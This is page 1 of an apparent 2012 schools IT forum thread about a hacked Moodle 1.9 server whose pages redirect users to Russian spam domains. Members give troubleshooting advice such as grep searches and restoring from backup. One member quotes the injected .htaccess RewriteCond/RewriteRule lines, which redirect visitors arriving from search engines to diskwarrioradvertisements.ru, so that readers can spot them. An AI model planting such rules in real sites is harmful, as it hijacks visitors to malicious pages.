+ Post New Thread
Page 1 of 2 12 LastLast
Results 1 to 15 of 28
Virtual Learning Platforms Thread, Moodle hacked in Technical; Hi, It looks like our Moodle has been hacked. When a user tries to find a course using 'Search Courses' ...
  1. #1

    Join Date
    May 2010
    Location
    Stoke on Trent
    Posts
    79
    Thank Post
    8
    Thanked 4 Times in 4 Posts
    Rep Power
    10

    Moodle hacked

    Hi,

    It looks like our Moodle has been hacked. When a user tries to find a course using 'Search Courses' , clicking on any of the links on the returned page will send them to somewhere random on the internet - mainly russian sites, such as:

    diskwarrioradvertisements.ru/Documentation?8

    ** By Links, I mean ALL links on the page. Even to the users profile, logout etc.

    Moodle & php are not really my thing, so I'm in the dark here.

    I can see that the 'Search Courses' 'GO' button fires up courses/search.PHP & I've tried replacing this with another php file which I know is clean but it still does the same thing. Search.PHP has a couple of includes (config.php and lib.php) so I'll check them.

    I've also searched the database for the Russian site mentioned above but I can't find it, so I guess it must be hardcoded into a php script somewhere?

    Everything else works fine. You wouldn't know there was anything wrong unless you searched for a course. I'd like to solve this with a minimum of fuss & take measures to prevent it happening again.

    We are running Moodle 1.9 on an Ubuntu server

    Cheers!
    Last edited by CapnPugwash; 4th September 2012 at 03:03 PM.

  2. #2

    TechMonkey's Avatar
    Join Date
    Dec 2005
    Location
    South East
    Posts
    3,303
    Thank Post
    226
    Thanked 412 Times in 305 Posts
    Rep Power
    163
    I would just replace all the files with ones from a download. Otherewise you can't guarantee what other nasties are hiding.

  3. #3

    Oaktech's Avatar
    Join Date
    Jul 2011
    Location
    Bournemouth
    Posts
    2,964
    Thank Post
    838
    Thanked 578 Times in 451 Posts
    Rep Power
    275
    If you have a backup, now would be a good time to use it...

  4. #4

    Steve21's Avatar
    Join Date
    Feb 2011
    Location
    Swindon
    Posts
    2,717
    Thank Post
    341
    Thanked 517 Times in 485 Posts
    Rep Power
    180
    Quote Originally Posted by CapnPugwash View Post
    Hi,

    It looks like our Moodle has been hacked. When a user tries to find a course using 'Search Courses' , clicking on any of the links on the returned page will send them to somewhere random on the internet - mainly russian sites, such as:

    diskwarrioradvertisements.ru/Documentation?8

    ** By Links, I mean ALL links on the page. Even to the users profile, logout etc.

    Moodle & php are not really my thing, so I'm in the dark here.

    I can see that the 'Search Courses' 'GO' button fires up courses/search.PHP & I've tried replacing this with another php file which I know is clean but it still does the same thing. Search.PHP has a couple of includes (config.php and lib.php) so I'll check them.

    I've also searched the database for the Russian site mentioned above but I can't find it, so I guess it must be hardcoded into a php script somewhere?

    Everything else works fine. You wouldn't know there was anything wrong unless you searched for a course. I'd like to solve this with a minimum of fuss & take measures to prevent it happening again.

    We are running Moodle 1.9 on an Ubuntu server

    Cheers!
    Clough hall by any chance?

    Seems there's a lot of redirect hacks going around at the moment within schools.

    Most of them are editing the htaccess files, and putting redirects within them (often in white text )

    Check for a line like this in your htaccess files

    Code:
    RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|youtube|wikipedia|excite|..suchmaschine|web-archiv|infospace)\.(.*)
    RewriteRule ^(.*)$ http://diskwarrioradvertisements.ru/Documentation?8 [R=301,L]
    Might be slightly different obviously depending on your version of it, but might help.

    Steve

  5. #5

    Steve21's Avatar
    Join Date
    Feb 2011
    Location
    Swindon
    Posts
    2,717
    Thank Post
    341
    Thanked 517 Times in 485 Posts
    Rep Power
    180
    There we go, even found few examples of people with same one online

    RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|ex cite|altavista|msn|netscape|aol|hotbot|goto|infose ek|mamma|alltheweb|lycos|search|metacrawler|bing|d ogpile|facebook|twitter|blog|live|myspace|linkedin |flickr|filesearch|yell|openstat|metabot|gigablast |entireweb|amfibi|dmoz|yippy|walhello|webcrawler|j ayde|findwhat|teoma|euroseek|wisenut|about|thunder stone|ixquick|terra|lookle|metaeureka|searchspot|s lider|topseven|allthesites|libero|clickey|galaxy|b rainysearch|pocketflier|verygoodsearch|bellnet|fre enet|fireball|flemiro|suchbot|acoon|devaro|fastbot |netzindex|abacho|allesklar|suchnase|schnellsuche| sharelook|sucharchiv|suchbiene|suchmaschine|infosp ace)\.(.*)
    RewriteRule ^(.*)$ http://diskwarrioradvertisements.ru/Documentation?8 [R=301,L]
    RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|freenet|a rcor|alexana|tiscali|kataweb|voila|sfr|startpagina |kpnvandaag|ilse|wanadoo|telfort|hispavista|passag en|spray|eniro|telia|bluewin|sympatico|nlsearch|at search|klammeraffe|sharelook|suchknecht|ebay|abizd irectory|alltheuk|bhanvad|daffodil|click4choice|ex alead|findelio|gasta|gimpsy|globalsearchdirectory| hotfrog|jobrapido|kingdomseek|mojeek|searchers|sim plyhired|splut|thisisouryear|ukkey|uwe|friendsreun ited|jaan|qp|rtl|apollo7|bricabrac|findloo|kobala| limier|express|bestireland|browseireland|finditire land|iesearch|kompass|startsiden|confex|finnalle|g ulesider|keyweb|finnfirma|kvasir|savio|sol|startsi den|allpages|america|botw|chapu|claymont|clickz|cl ush|ehow|findhow|icq|westaustraliaonline)\.(.*)
    RewriteRule ^(.*)$ http://diskwarrioradvertisements.ru/Documentation?8 [R=301,L]
    Anything that's like that is all bad in .htaccess files

    Steve

  6. #6

    Join Date
    May 2010
    Location
    Stoke on Trent
    Posts
    79
    Thank Post
    8
    Thanked 4 Times in 4 Posts
    Rep Power
    10
    Hi Steve, thanks for that - how did you know I was from Clough Hall?

    OK, here's how it's looking. Moodle isn't something I know a lot about but it looks like there are three areas - the database, the course data & Moodle itself.

    I've searched the database for any mention of the dodgy web sites and it's clean. I've replaced the main Moodle folder with one that I know is clean and that didn't change anything. So I'm assuming it's in the data part where the courses are. We do back up the Moodle server but the problem wasn't reported for a few weeks....

    It makes total sense that it's a htaccess file issue... but I've checked everyone of them and can't find anything!

    What could I be missing? I could be making some poor assumptions here so please feel free to correct me.

  7. #7

    Steve21's Avatar
    Join Date
    Feb 2011
    Location
    Swindon
    Posts
    2,717
    Thank Post
    341
    Thanked 517 Times in 485 Posts
    Rep Power
    180
    Can pretty much guarantee it's at least partially a htaccess issue. As it'll fire off every time I redirect from google to your site, yet not loading it directly It's even doing it off your main VLE page, without searching/logging in.

    Also seems to be changing where it's redirecting to, unless you've done a clean and got infected again? (From your comment above, guessing you replaced main folder, but not the actual issue)

    See below:

    cloughall1.jpg

    cloughall2.jpg


    When you checked your htaccess files did you check white space too? Often adds millions of white lines into them, to stop you scrolling down further etc

    Depends on your opinion of course, but any objects to uploading some of your htaccess files so we can take a look? Understand if you don't want though.

    Steve

  8. #8

    Join Date
    May 2010
    Location
    Stoke on Trent
    Posts
    79
    Thank Post
    8
    Thanked 4 Times in 4 Posts
    Rep Power
    10
    Hi Steve,

    I'd be happy to let you see the Htaccess files, I really need to get to the bottom of this. When I've looked at the files, I've done a search 'RewriteCond' - I hoped that that this would get around the white text issue.

    Yes, I replaced the main Moodle folder so I presume, whatever is lurking in there has *got* to be in the MoodleData folder - am I right?

    Cheers for your help, much appreciated.

  9. #9


    Join Date
    May 2009
    Posts
    3,262
    Thank Post
    287
    Thanked 880 Times in 658 Posts
    Rep Power
    339
    @CapnPugwash - how are your searching? Using grep from a shell on the box should be fairly foolproof.

    Also how did you search the database?
    Last edited by pcstru; 10th September 2012 at 06:59 PM.

  10. #10

    Join Date
    May 2010
    Location
    Stoke on Trent
    Posts
    79
    Thank Post
    8
    Thanked 4 Times in 4 Posts
    Rep Power
    10
    Hi,

    Well you're exposing my ignorance here (which is a good thing for me) I've just been opening the htaccess files as text files and doing a standard word search.

  11. #11


    Join Date
    May 2009
    Posts
    3,262
    Thank Post
    287
    Thanked 880 Times in 658 Posts
    Rep Power
    339
    Probably my poor assumption. You are running on a Windows box - not a *nix box?

  12. #12

    Join Date
    May 2010
    Location
    Stoke on Trent
    Posts
    79
    Thank Post
    8
    Thanked 4 Times in 4 Posts
    Rep Power
    10
    I'm running Moodle on an Ubuntu server. TBH, I don't know much about it, it was set up by a fella who left a while back and I've never had the time to sit down and get to grips with it.

  13. #13


    Join Date
    May 2009
    Posts
    3,262
    Thank Post
    287
    Thanked 880 Times in 658 Posts
    Rep Power
    339
    Ok. So how did you do the database search? How did you 'open text files'? If you could use ssh or telnet to login to the box and use a recursive grep search to look for the offending rewrite rules from the web root, that shouldn't miss anything. Simmilarly for the database, using mysqldump to produce a text file of the database then grepping that will be quite thorough.

  14. #14

    Join Date
    May 2010
    Location
    Stoke on Trent
    Posts
    79
    Thank Post
    8
    Thanked 4 Times in 4 Posts
    Rep Power
    10
    Quote Originally Posted by pcstru View Post
    Ok. So how did you do the database search? How did you 'open text files'? If you could use ssh or telnet to login to the box and use a recursive grep search to look for the offending rewrite rules from the web root, that shouldn't miss anything. Simmilarly for the database, using mysqldump to produce a text file of the database then grepping that will be quite thorough.
    Hi,

    I used PHPMYADMIN to search the database
    In Ubuntu I searched for the htaccess files, right clicked on them and opened in a text editor

    I'll have a look at grep, thanks for the pointer

  15. #15

    Join Date
    May 2010
    Location
    Stoke on Trent
    Posts
    79
    Thank Post
    8
    Thanked 4 Times in 4 Posts
    Rep Power
    10
    Well, after looking at this all morning, I'm now more confused than ever.

    To recap: I'm running Moodle 1.9 on an Ubuntu server.

    When users log into Moodle, everything seems all right. However, when they 'Search Courses' , the returned page will look all right (hovering the mouse over all the links, I can see they are as they should be) but clicking on any link will take to one of these tupe of pages:

    unchallengedminimoogs.ru
    oomphstereomono.ru
    convertednextpages.ru

    I replaced my Moodle folder with a 'clean' version
    I renamed my current MoodleData folder and created a new one with three empty folders inside (cache, sessions, and temp)

    I then went to my Moodle site, logged in and checked the 'search courses' functionality - same problem with the nasty re-directs.

    I did an SQLdump of my database, opened it in a text editor and searched for any reference to the websites mentioned - found nothing.

    .... I really don't understand.... I agree with Steve, the most obvious culprit is a hacked htaccess file... but if it's not in either my Moodle or MoodleData folders.... where could it be?!

SHARE:
+ Post New Thread
Page 1 of 2 12 LastLast

Similar Threads

  1. Moodle causing "Service Unavailable" [FIXED]
    By fooby in forum Web Development
    Replies: 0
    Last Post: 19th January 2006, 12:15 PM
  2. Do you Moodle?
    By RobC in forum Web Development
    Replies: 45
    Last Post: 15th January 2006, 06:17 PM
  3. LEA, Moodle, VLE
    By Jake in forum How do you do....it?
    Replies: 8
    Last Post: 11th January 2006, 06:36 PM
  4. Moodle and remote access.
    By eejit in forum Windows
    Replies: 4
    Last Post: 5th January 2006, 10:59 AM
  5. Moodle
    By StewartKnight in forum Educational Software
    Replies: 15
    Last Post: 19th July 2005, 06:10 PM

Thread Information

Users Browsing this Thread

There are currently 1 users browsing this thread. (0 members and 1 guests)

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •